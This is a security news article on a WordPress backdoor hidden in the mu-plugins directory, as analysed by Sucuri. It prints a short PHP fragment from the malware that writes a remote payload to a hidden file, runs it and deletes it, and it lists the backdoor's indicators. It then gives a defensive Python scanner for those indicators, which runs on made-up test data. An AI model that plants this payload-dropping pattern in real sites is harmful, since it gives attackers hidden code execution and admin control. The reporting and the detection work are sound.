Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites

24 July 2025
A sophisticated WordPress malware campaign has been discovered operating through the rarely monitored mu-plugins directory, giving attackers persistent access to compromised websites while evading traditional security measures.

The malicious code, identified as wp-index.php, exploits WordPress’s “must-use plugins” functionality to maintain continuous operation without the possibility of deactivation through the admin panel.

The backdoor employs advanced obfuscation techniques, utilizing ROT13 encoding to disguise its command-and-control communications.

Upon execution, the malware fetches remote payloads from a concealed URL and stores them directly in the WordPress database under the option key “_hdra_core”, effectively bypassing filesystem-based security scans that focus primarily on file modifications.

Sucuri analysts identified this particularly insidious threat during routine malware investigations, noting its exceptional ability to maintain persistence across multiple infection vectors.

The researchers observed that the malware creates a hidden administrative user named “officialwp” while simultaneously hiding its presence from the WordPress user interface through carefully crafted filter functions.

The infection mechanism demonstrates remarkable sophistication in its execution methodology.

The primary loader script retrieves base64-encoded payloads from the remote server at hxxps://1870y4rr4y3d1k757673q[.]xyz/cron.php, which, when decoded, reveals a comprehensive malware framework.

Remote Payload at cron.php (Source – Sucuri)

This framework includes a covert file manager disguised as “pricing-table-3.php” within the active theme directory, protected by a custom authentication token “fsociety_OwnzU_4Evr_1337H4x!” transmitted via HTTP headers.

Database-Centric Persistence Strategy

The malware’s most concerning feature lies in its database-centric approach to maintaining persistence.

Rather than relying solely on file-based infections that can be detected through integrity monitoring, the backdoor stores its payload within WordPress’s options table. It then executes this stored payload before immediately cleaning up its temporary files, leaving minimal forensic evidence.

// Write the decoded payload to a hidden, time-derived filename under wp-content/uploads
$cronCore = wp_upload_dir()['basedir'] . '/.sess-' . md5(time()) . '.php';
file_put_contents($cronCore, base64_decode($payload));
include($cronCore);   // execute the dropped file
@unlink($cronCore);   // delete it straight away, suppressing any warning

This approach ensures the malware survives standard cleanup procedures while providing attackers with remote code execution capabilities and complete administrative control over compromised WordPress installations.
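The indicators named in this write-up (a loader in mu-plugins using ROT13-wrapped URLs, the “_hdra_core” option row, the “officialwp” user, and the “pricing-table-3.php” theme file) can be checked from a defender's side with a small triage script. The following is an added example, not code from Sucuri or from the malware; the site layout, option names and user logins it scans are constructed stand-ins, and the ROT13 string in the sample loader decodes to a made-up example.test URL.

```python
import codecs
import re
import tempfile
from pathlib import Path

ROT13_URL_RE = re.compile(r"uggcf?://[A-Za-z0-9.\-_/]+")  # "http(s)://" after ROT13
SUSPICIOUS_OPTION = "_hdra_core"          # option key named in the Sucuri analysis
SUSPICIOUS_USER = "officialwp"            # hidden admin user named in the analysis
SUSPICIOUS_THEME_FILE = "pricing-table-3.php"  # fake file manager in the theme dir
def scan_mu_plugins(wp_root):
    """Flag mu-plugins files that call str_rot13 or embed ROT13-encoded URLs."""
    findings = []
    mu_dir = Path(wp_root) / "wp-content" / "mu-plugins"
    if not mu_dir.is_dir():
        return findings
    for path in sorted(mu_dir.rglob("*.php")):
        text = path.read_text(errors="ignore")
        if "str_rot13" in text:
            findings.append((path.name, "calls str_rot13"))
        for enc in ROT13_URL_RE.findall(text):
            findings.append((path.name, "rot13 url " + codecs.decode(enc, "rot13")))
    return findings

def scan_themes(wp_root):
    """Look for the fake file manager dropped into any theme directory."""
    themes = Path(wp_root) / "wp-content" / "themes"
    return [p.name for p in themes.rglob(SUSPICIOUS_THEME_FILE)] if themes.is_dir() else []

def scan_db_rows(option_names, user_logins):
    """Check option_name / user_login values (e.g. exported with wp-cli or a SQL dump)."""
    findings = []
    if SUSPICIOUS_OPTION in option_names:
        findings.append("option " + SUSPICIOUS_OPTION)
    if SUSPICIOUS_USER in user_logins:
        findings.append("user " + SUSPICIOUS_USER)
    return findings

def demo():
    """Build a constructed (fake) site layout and run all three checks over it."""
    root = Path(tempfile.mkdtemp())
    mu = root / "wp-content" / "mu-plugins"
    mu.mkdir(parents=True)
    # constructed stand-in for the loader: a ROT13 string hiding a C2-style URL
    (mu / "wp-index.php").write_text("<?php $u = str_rot13('uggcf://rknzcyr.grfg/peba.cuc');")
    theme = root / "wp-content" / "themes" / "twentytwentyfour"
    theme.mkdir(parents=True)
    (theme / SUSPICIOUS_THEME_FILE).write_text("<?php // constructed placeholder")
    options, users = ["siteurl", SUSPICIOUS_OPTION], ["admin", SUSPICIOUS_USER]  # constructed rows
    return scan_mu_plugins(root), scan_themes(root), scan_db_rows(options, users)
```

On a real host, point the scan functions at the WordPress root and feed scan_db_rows the output of `wp option list` and `wp user list`; the ROT13 check is a heuristic and legitimate plugins rarely trip it.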

The post Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites appeared first on Cyber Security News.